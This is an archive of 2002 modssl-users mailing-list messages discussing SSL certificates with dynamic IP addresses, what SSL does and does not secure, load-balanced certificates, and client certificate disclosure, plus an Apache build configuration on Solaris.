Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp-server6.tampabay.rr.com id HAA16269; Thu, 9 May 2002 07:54:10 +0200 (MET DST)
Received: from cfl.rr.com (106.99.35.65.cfl.rr.com [65.35.99.106])
	by smtp-server6.tampabay.rr.com (8.12.2/8.11.2) with ESMTP id g495s9Dn009100
	for ; Thu, 9 May 2002 01:54:09 -0400 (EDT)
Message-ID: <3CDA0E86.76C750D@cfl.rr.com>
Date: Thu, 09 May 2002 01:52:06 -0400
From: Jack Jacobsen 
Organization: Phoenix AMS
X-Mailer: Mozilla 4.78C-SGI [en] (X11; I; IRIX 6.5 IP22)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
References: <3CD8B539.866EC414@cfl.rr.com> <00a401c1f696$8263f240$0500a8c0@rdcss.com> <3CD963B4.3010806@thenewpush.com>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Jacobsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think you're right.  I may have to look into getting a a real cert and
static IP address (if I can) or going with a DNS service like zoneedit.com.
I've heard that the DNS sites really aren't the best things to use for
serious security, so a static IP address seems to be the only reliable
solution.  I really appreciate your help.

Jack Jacobsen


Balázs Nagy wrote:

> robert@rdcss.com wrote:
> > www.zoneedit.com  they can allow you to have a
> > domain name tagged thru a dynamic ip address.  you have to host the
> > domain name they host your dns for the domain name.
>
> And than, in the Apache conf, you can just use the default
> setting for your SSL virtual host (the one that is already there)
> and you will be in business. You might want to consider geting a real cert
> though if your site will be public.
>
> --
> Cheers,
>         Balázs
>

--
Jack Jacobsen
jcj@cfl.rr.com
Voice (407) 636-9458
FAX   (407) 632-8189



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 08:01:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA16679; Thu, 9 May 2002 08:00:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id HAA16601; Thu, 9 May 2002 07:59:30 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id BAA22394;
	Thu, 9 May 2002 01:59:52 -0400
Date: Thu, 9 May 2002 01:59:52 -0400 (EDT)
From: "R. DuFresne" 
To: Jack Jacobsen 
cc: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
In-Reply-To: <3CDA0E86.76C750D@cfl.rr.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



umm, you do understand that ssl is not used to secure your website, yes?

Thanks,

Ron DuFresne

On Thu, 9 May 2002, Jack Jacobsen wrote:

> I think you're right.  I may have to look into getting a a real cert and
> static IP address (if I can) or going with a DNS service like zoneedit.com.
> I've heard that the DNS sites really aren't the best things to use for
> serious security, so a static IP address seems to be the only reliable
> solution.  I really appreciate your help.
> 
> Jack Jacobsen
> 
> 
> Balázs Nagy wrote:
> 
> > robert@rdcss.com wrote:
> > > www.zoneedit.com  they can allow you to have a
> > > domain name tagged thru a dynamic ip address.  you have to host the
> > > domain name they host your dns for the domain name.
> >
> > And than, in the Apache conf, you can just use the default
> > setting for your SSL virtual host (the one that is already there)
> > and you will be in business. You might want to consider geting a real cert
> > though if your site will be public.
> >
> > --
> > Cheers,
> >         Balázs
> >
> 
> --
> Jack Jacobsen
> jcj@cfl.rr.com
> Voice (407) 636-9458
> FAX   (407) 632-8189
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 10:09:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA25234; Thu, 9 May 2002 10:08:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id KAA25209; Thu, 9 May 2002 10:07:32 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GVU3WB00.Q45 for ; Thu, 9 May 2002
          09:07:23 +0100 
Message-ID: <3CDA2E3C.6070800@itaction.co.uk>
Date: Thu, 09 May 2002 09:07:24 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
References: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you can get a real certificate based on a domainname you 'own' then 
which ip you come from is irrelevant.
The whole point of the certificate is that no-one can impersonate your 
website, even if they steal your dns away, because they don't have your 
private key.
the only issues with someone like zoneedit.org is they are a third party 
and you have to take a view on reliability.

R. DuFresne wrote:

>umm, you do understand that ssl is not used to secure your website, yes?
>
>Thanks,
>
>Ron DuFresne
>
>On Thu, 9 May 2002, Jack Jacobsen wrote:
>
>  
>
>>I think you're right.  I may have to look into getting a a real cert and
>>static IP address (if I can) or going with a DNS service like zoneedit.com.
>>I've heard that the DNS sites really aren't the best things to use for
>>serious security, so a static IP address seems to be the only reliable
>>solution.  I really appreciate your help.
>>
>>Jack Jacobsen
>>
>>
>>Balázs Nagy wrote:
>>
>>    
>>
>>>robert@rdcss.com wrote:
>>>      
>>>
>>>>www.zoneedit.com  they can allow you to have a
>>>>domain name tagged thru a dynamic ip address.  you have to host the
>>>>domain name they host your dns for the domain name.
>>>>        
>>>>
>>>And than, in the Apache conf, you can just use the default
>>>setting for your SSL virtual host (the one that is already there)
>>>and you will be in business. You might want to consider geting a real cert
>>>though if your site will be public.
>>>
>>>--
>>>Cheers,
>>>        Balázs
>>>
>>>      
>>>
>>--
>>Jack Jacobsen
>>jcj@cfl.rr.com
>>Voice (407) 636-9458
>>FAX   (407) 632-8189
>>
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>    
>>
>
>--
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>        admin & senior security consultant:  sysinfo.com
>                        http://sysinfo.com
>
>"Cutting the space budget really restores my faith in humanity.  It
>eliminates dreams, goals, and ideals and lets us get straight to the
>business of hate, debauchery, and self-annihilation."
>                -- Johnny Hart
>
>testing, only testing, and damn good at it too!
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 11:27:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA00689; Thu, 9 May 2002 11:26:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id LAA00623; Thu, 9 May 2002 11:25:15 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id FAA23028
	for ; Thu, 9 May 2002 05:25:47 -0400
Date: Thu, 9 May 2002 05:25:47 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
In-Reply-To: <3CDA2E3C.6070800@itaction.co.uk>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


On Thu, 9 May 2002, Peter Viertel wrote:

> If you can get a real certificate based on a domainname you 'own' then 
> which ip you come from is irrelevant.
> The whole point of the certificate is that no-one can impersonate your 
> website, even if they steal your dns away, because they don't have your 
> private key.
> the only issues with someone like zoneedit.org is they are a third party 
> and you have to take a view on reliability.

Yes, that's an important part of ssl and certificates, yet, not the whole
issue.  A point to make here is that ssl does not fix security issues
related to bad cgi scripting or other issues that might well lead to the
compromise of your server.  It does not mitigate patching a broked OS or
other software involved in the serving or web based information.

Perhaps the best way to view ssl, and I'm sure there might be some
disagreement or others might propose other views, is that it is a service
provided mostly as a benifit to the client, those folks you wish to do
business with, in that you are assuring them not only that you really are
who you say you are, but, also providing them a secure channel of
comunication for passing delicate personal information.  It's primary
purpose is not to enhance the security of the httpd or the hosting
system.

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 11:59:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA02594; Thu, 9 May 2002 11:58:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.lgo.la id LAA02529; Thu, 9 May 2002 11:57:06 +0200 (MET DST)
Received: (qmail 94319 invoked by uid 92); 9 May 2002 01:55:31 -0000
Received: from unknown (HELO tr0n) (199.174.88.75)
  by 64.77.63.212 with SMTP; 9 May 2002 01:55:31 -0000
From: "webEpix Administration" 
To: 
Subject: RE: Dynamic IP Addressing
Date: Thu, 9 May 2002 03:01:37 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "webEpix Administration" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I agree, i view mod ssl as a way of transmitting my data from server to
client in a secure manor not as a way of insuring the total security of my
server. Maintaining system security goes far beyon jus making sure
transmissions between client and server are secure, but that the system
itself is secure.



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne
Sent: Thursday, May 09, 2002 02.26 AM
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing



On Thu, 9 May 2002, Peter Viertel wrote:

> If you can get a real certificate based on a domainname you 'own' then
> which ip you come from is irrelevant.
> The whole point of the certificate is that no-one can impersonate your
> website, even if they steal your dns away, because they don't have your
> private key.
> the only issues with someone like zoneedit.org is they are a third party
> and you have to take a view on reliability.

Yes, that's an important part of ssl and certificates, yet, not the whole
issue.  A point to make here is that ssl does not fix security issues
related to bad cgi scripting or other issues that might well lead to the
compromise of your server.  It does not mitigate patching a broked OS or
other software involved in the serving or web based information.

Perhaps the best way to view ssl, and I'm sure there might be some
disagreement or others might propose other views, is that it is a service
provided mostly as a benifit to the client, those folks you wish to do
business with, in that you are assuring them not only that you really are
who you say you are, but, also providing them a secure channel of
comunication for passing delicate personal information.  It's primary
purpose is not to enhance the security of the httpd or the hosting
system.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 16:21:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20350; Thu, 9 May 2002 16:20:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id QAA20322; Thu, 9 May 2002 16:19:49 +0200 (MET DST)
Received: (qmail 22714 invoked by uid 908); 9 May 2002 14:19:46 -0000
Date: Thu, 9 May 2002 10:19:46 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
Message-ID: <20020509101946.A21875@sidehack.sat.gweep.net>
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from admin@webepix.com on Thu, May 09, 2002 at 03:01:37AM -0700
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time webEpix Administration shaped the electrons to say...
> I agree, i view mod ssl as a way of transmitting my data from server to
> client in a secure manor not as a way of insuring the total security of my
> server. Maintaining system security goes far beyon jus making sure
> transmissions between client and server are secure, but that the system
> itself is secure.

SSL is like an armed courier.  It protects the data during transfer
from client to server, and vice-versa.  But it doesn't protect the
data on the client or the server, that's another issue.

Sending a message in an armored truck doesn't help if you leave it
laying out in the open on your desk where anyone can read it.

When I worked for GTEI's VPN group I had to explain this over and over
to clients.  "Why do I need a firewall if I have VPN?"  Etc...

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 18:09:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27464; Thu, 9 May 2002 18:08:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pmesmtp01.wcom.com id SAA27038; Thu, 9 May 2002 18:07:43 +0200 (MET DST)
Received: from CONVERSION-DAEMON by firewall.wcom.com (PMDF V5.2-33 #47837)
 id <0GVU00F01Q3QRP@firewall.wcom.com> for modssl-users@modssl.org; Thu,
 9 May 2002 16:07:03 +0000 (GMT)
Received: from dgismtp05.wcomnet.com ([166.38.58.88])
 by firewall.wcom.com (PMDF V5.2-33 #47837)
 with ESMTP id <0GVU00F98Q3QB2@firewall.wcom.com> for modssl-users@modssl.org;
 Thu, 09 May 2002 16:07:02 +0000 (GMT)
Received: from dgismtp05.wcomnet.com by dgismtp05.wcomnet.com
 (iPlanet Messaging Server 5.1 (built May  7 2001))
 with SMTP id <0GVU00K01Q365E@dgismtp05.wcomnet.com> for
 modssl-users@modssl.org; Thu, 09 May 2002 16:06:42 +0000 (GMT)
Received: from gtjones ([166.34.144.55])
 by dgismtp05.wcomnet.com (iPlanet Messaging Server 5.1 (built May  7 2001))
 with SMTP id <0GVU00IJ2Q35H7@dgismtp05.wcomnet.com> for
 modssl-users@modssl.org; Thu, 09 May 2002 16:06:42 +0000 (GMT)
Date: Thu, 09 May 2002 10:02:44 -0600
From: Greg Jones 
Subject: Certificates and Apache/modssl
To: modssl-users@modssl.org
Message-id: <002501c1f772$f4efe760$379022a6@wcomnet.com>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7bit
Importance: Normal
X-Priority: 3 (Normal)
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Greg Jones 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All-

We are planning on using commercial load balancing software for two servers
running apache with modssl. Does Apache with modssl require that each server
have its own certificate or can I use the same certificate on both servers
since they'll be answering to the same virtual ip? Also, will my certificate
be based on the virtual ip or the ip of the server. Users will always get to
the web servers via virtual IP.

Thanks,

Greg Jones
Voice Portal Systems Administrator

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  9 23:26:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA20464; Thu, 9 May 2002 23:25:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id XAA20437; Thu, 9 May 2002 23:25:03 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 9 May 2002 17:25:13 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: making client app SSL-capable
Date: Thu, 9 May 2002 17:25:10 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  My need is to have my client app  (written in C)  that writes to an HTTP
server currently, get "converted" somehow so it can write instead to an
HTTPS server app.  (Read back responses need not be SSL by the way - only
the sent requests.)  What's a good way to do this?

  Can i interpose an httpd that collects the output from my client and
somehow forwards this to the destination with encryption turned on?  Or do I
use some sort of wrapper app?  Or (ugh!) does my app have to be rewritten?

-george
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 05:33:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA16412; Fri, 10 May 2002 05:32:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhub.air.net.au id FAA16369; Fri, 10 May 2002 05:31:33 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by mailhub.air.net.au (Postfix) with ESMTP
	id 9E20F36D55; Fri, 10 May 2002 13:31:22 +1000 (EST)
Date: Thu, 9 May 2002 23:31:22 -0400 (EDT)
From: Ben Elliston 
To: openssl-users@openssl.org
Cc: modssl-users@modssl.org
Subject: client certificate disclosures
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ben Elliston 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a client certificate that was issued to me by a CA that contains
potentially sensitive information such as my name, my position within my
organisation, my location, and so on.  This certificate has been imported
into my browser (Netscape).

What are the rules in the SSL protocol regarding the disclosure of client
certs to any HTTPS server I might connect to?  Since the certs are signed
and not encrypted, if SSL sends some or all of these certs to a foreign
HTTPS server, won't my X.509 credentials be disclosed to the foreign
server?

I am hoping I have a fundamental misunderstanding here ..

Thanks, Ben

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 09:11:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA00796; Fri, 10 May 2002 09:10:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from s05128.postbox.be id JAA00745; Fri, 10 May 2002 09:10:01 +0200 (MET DST)
Received: from [194.78.226.46] by postbox.be with ESMTP for modssl-users@modssl.org; Fri, 10 May 2002 09:09:41 +0200
Message-Id: <002b01c1f7f1$a779f050$24aeb381@fuy001>
From: "Frederik Uyttersprot" 
To: 
References: <20020508125414.A37299@sidehack.sat.gweep.net> <20020508174826.GA15593@serv01.aet.tu-cottbus.de> <20020508140504.A44809@sidehack.sat.gweep.net>
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8
Date: Fri, 10 May 2002 09:09:36 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederik Uyttersprot" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Check out,

http://www.perldoc.com/perl5.6.1/lib/mod_perl_traps.html

Solved most of my problems on Solaris.

For OpenSSL I used settings from mod_ssl INSTALL readme. Worth checking it
out.

The configure for Apache 1.3.24 I used,

EAPI_MM="../mm-1.1.3" SSL_BASE="../openssl-0.9.6c" \
 ./configure \
 --prefix=/usr/local/apache \
 --enable-module=vhost_alias \
 --enable-module=unique_id \
 --enable-module=rewrite \
 --enable-module=speling \
 --enable-module=expires \
 --enable-module=info \
 --enable-module=usertrack \
 --enable-module=proxy \
 --enable-module=so \
 --enable-shared=ssl \
 --enable-module=ssl \
 --disable-rule=SSL_COMPAT \
 --activate-module=src/modules/perl/libperl.a \
 --enable-module=perl \
 --enable-rule=SHARED_CORE

----- Original Message -----
From: "MegaZone" 
To: 
Sent: Wednesday, May 08, 2002 8:05 PM
Subject: Re: Cannot load /path/libexec/libssl.so into server - Solaris 8


> Once upon a time Lutz Jaenicke shaped the electrons to say...
> > Dear Sir or Madam (whatever your real name might be)!
>
> My full legal name really is MegaZone.
>
> And I have XY chomosomes. ;-)
>
> But 'Sir' is so formal...
>
> > apachectl tells you, that it cannot load the shared library named
> > libssl.so.0.9.6, that seems to be referenced by libssl.so. Is libssl.so
> > a symbolic link? To which location does it point? Is the file really
there?
>
> It is not a symbolic link, and it is there.
>
> -rwxr-xr-x   1 root     other     286000 May  8 12:40 libssl.so
>
> I think I recall seeing something about the linker on Solaris 8 - Sun
> vs GNU.  But I can't seem to find anything now.
>
> -MZ, CISSP #3762, RHCE #806199299900541
> --
>  Gweep, Discordian, Author, Engineer,
me..
> "A little nonsense now and then, is relished by the wisest men"
781-788-0130
>   
Eris
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 09:29:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA02439; Fri, 10 May 2002 09:28:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id JAA02356; Fri, 10 May 2002 09:27:33 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id IAA11183;
	Fri, 10 May 2002 08:27:31 +0100
From: "Jeff" 
To: , 
Subject: RE: client certificate disclosures
Date: Fri, 10 May 2002 08:26:23 +0100
Message-ID: <000a01c1f7f4$12217cf0$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ben - all client cert details are available to the servers that you
present your certificate to.
This is a dump of some of the standard details presented to the server
in your client cert:

Client Certificate
------------------
SSL_CLIENT_A_KEY        rsaEncryption 
SSL_CLIENT_A_SIG        md5WithRSAEncryption 
SSL_CLIENT_I_DN         /C=GB/L=London/O=XXX Limited/OU=Certificate
Authority/CN=XXX Limited (Primary CA)/Email=security@xxx.com 
SSL_CLIENT_I_DN_C       GB 
SSL_CLIENT_I_DN_CN      XXX Limited (Primary CA) 
SSL_CLIENT_I_DN_Email   security@xxx.com 
SSL_CLIENT_I_DN_L       London 
SSL_CLIENT_I_DN_O       XXX Limited 
SSL_CLIENT_I_DN_OU      Certificate Authority 
SSL_CLIENT_M_SERIAL     D5 
SSL_CLIENT_M_VERSION    3 
SSL_CLIENT_S_DN         /C=GB/ST=20011211 110118/O=XXX Limited
London/OU=Director/CN=Jeff XXX/Email=jeff.xxx@xxx.com 
SSL_CLIENT_S_DN_C       GB 
SSL_CLIENT_S_DN_CN      Jeff xxx 
SSL_CLIENT_S_DN_Email   jeff.xxx@xxx.com 
SSL_CLIENT_S_DN_O       XXX Limited London 
SSL_CLIENT_S_DN_OU      Director
SSL_CLIENT_S_DN_ST      20011211 110118 
SSL_CLIENT_V_END        Dec 11 11:02:06 2006 GMT 
SSL_CLIENT_V_START      Dec 11 11:02:06 2001 GMT 
SSL_CLIENT_VERIFY       SUCCESS 

The CLIENT_I vars contain details of the certificate issuer.
The CLIENT_S vars contain details of the client.

Basically the entire contents of the certificate are available to any
server that you present this certificate to. 

In many browsers, you can control which certificate if any is presented
to the server, the details are not automatically presented, unless this
is how you configure your browser. In my experience with NS4.0-NS4.7x
and MS IE5.01-6.0, they do NOT automatically present a cert, unless you
change the default settings / internet options.

The certificate details are not passed un-encrypted over the internet -
they are passed to the server securely inside the SSL pipe, so details
are not disclosed to network sniffers. Of course the web-server can do
whatever it likes with the details, as it is one of the two trusted
parties in the conversation.

Regards
Jeff


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Ben Elliston
Sent: 10 May 2002 04:31
To: openssl-users@openssl.org
Cc: modssl-users@modssl.org
Subject: client certificate disclosures


I have a client certificate that was issued to me by a CA that contains
potentially sensitive information such as my name, my position within my
organisation, my location, and so on.  This certificate has been
imported
into my browser (Netscape).

What are the rules in the SSL protocol regarding the disclosure of
client
certs to any HTTPS server I might connect to?  Since the certs are
signed
and not encrypted, if SSL sends some or all of these certs to a foreign
HTTPS server, won't my X.509 credentials be disclosed to the foreign
server?

I am hoping I have a fundamental misunderstanding here ..

Thanks, Ben

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 09:44:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA03434; Fri, 10 May 2002 09:44:01 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id JAA03340; Fri, 10 May 2002 09:42:31 +0200 (MET DST)
